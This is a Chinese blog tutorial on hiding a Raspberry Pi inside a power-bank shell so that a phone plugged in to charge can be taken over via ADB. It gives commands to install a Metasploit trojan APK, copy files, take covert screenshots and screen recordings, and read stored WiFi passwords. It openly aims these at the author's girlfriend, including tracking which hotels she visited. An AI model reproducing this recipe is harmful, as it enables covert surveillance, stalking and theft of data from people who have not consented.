前言

本教程纯属虚构,里面涉及到的思路仅供吹牛。请勿非法使用,造成法律后果请自负!

什么是恶意充电宝

准备

  • 树莓派(虚拟机下没有尝试,因为需要安装手机的驱动。理论上应该也是可以的。)
  • 充电宝外壳(有条件的可以尝试利用3D打印,自己做一个外壳。)
    -数据线

安装ADB

在树莓派中执行

apt-get install adb

如果失败,请更新你的源为国内阿里云或中科大的源。
验证在终端中输入adb如下,则证明安装完成。
adb

配置手机

在设置中开启开发者选项USB试调即可。

开始测试

将手机和树莓派用数据线连接

这里提示是在充电,我们来看看在不知不觉中我们是如何进入手机的。
终端执行

adb devices


其中34fb90f30704 device就是我们刚才连接的手机。
比如这时想指定 34fb90f30704 这个设备来运行 adb 命令获取屏幕分辨率:

adb -s 34fb90f30704 shell wm size

分辨率.png

显示手机中的所有应用

adb shell pm list packages


其他命令参见列表

安装apk

利用这个功能,我们可以把msf木马安装到我们的目标手机,方便我们测试!
命令格式:

adb install [-lrtsdg] <path_to_apk>

参数:

adb install 后面可以跟一些可选参数来控制安装 APK 的行为,可用参数及含义如下:

如:adb install -g /root/11.apk
效果如下:

文件管理

复制设备里的文件到电脑

命令:

adb pull <设备里的文件路径> [电脑上的目录]

其中 电脑上的目录 参数可以省略,默认复制到当前目录。
例:

adb pull /sdcard/sr.mp4 ~/tmp/

小技巧:设备上的文件路径可能需要 root 权限才能访问,如果你的设备已经 root 过,可以先使用 adb shell 和 su 命令在 adb shell 里获取 root 权限后,先 cp /path/on/device /sdcard/filename 将文件复制到 sdcard,然后 adb pull /sdcard/filename /path/on/pc。

复制电脑里的文件到设备

命令:

adb push <电脑上的文件路径> <设备里的目录>

例:

adb push ~/sr.mp4 /sdcard/

查看手机电池情况

adb shell dumpsys battery


其中 scale 代表最大电量,level 代表当前电量。

屏幕截图

感觉这个功能很实用,很隐蔽。

adb exec-out screencap -p > bbskali.png

我们利用vnc登录,查看效果。
目标手机的截图

录制屏幕

录制屏幕以 mp4 格式保存到 /sdcard:

adb shell screenrecord /sdcard/filename.mp4

需要停止时按 Ctrl-C,默认录制时间和最长录制时间都是 180 秒。

如果需要导出到电脑:

adb pull /sdcard/filename.mp4

查看连接过的 WiFi 密码

注:需要 root 权限。
命令:

adb shell
su
cat /data/misc/wifi/*.conf

利用这个命令,我们还可以看看女盆去过那个宾馆或酒店。毕竟都会默默的连WIFI
好了,其他的一些adb命令,你们自己搜索去玩吧。这里不再演示了!

伪装

现在最重要的问题是,如何让女盆把手机和树莓派连接。我这里的思路是将树莓派放到充电宝的盒子中,并且由充电宝为树莓派提供电源。

最后,找个外壳放到里面即可。

价格: 1.00 元

温馨提示:免登录付款后1天内可重复阅读隐藏内容,登录付款后可永久阅读隐藏的内容。 付费可读
Last modification:March 21st, 2020 at 07:00 pm
正在沿街乞讨中……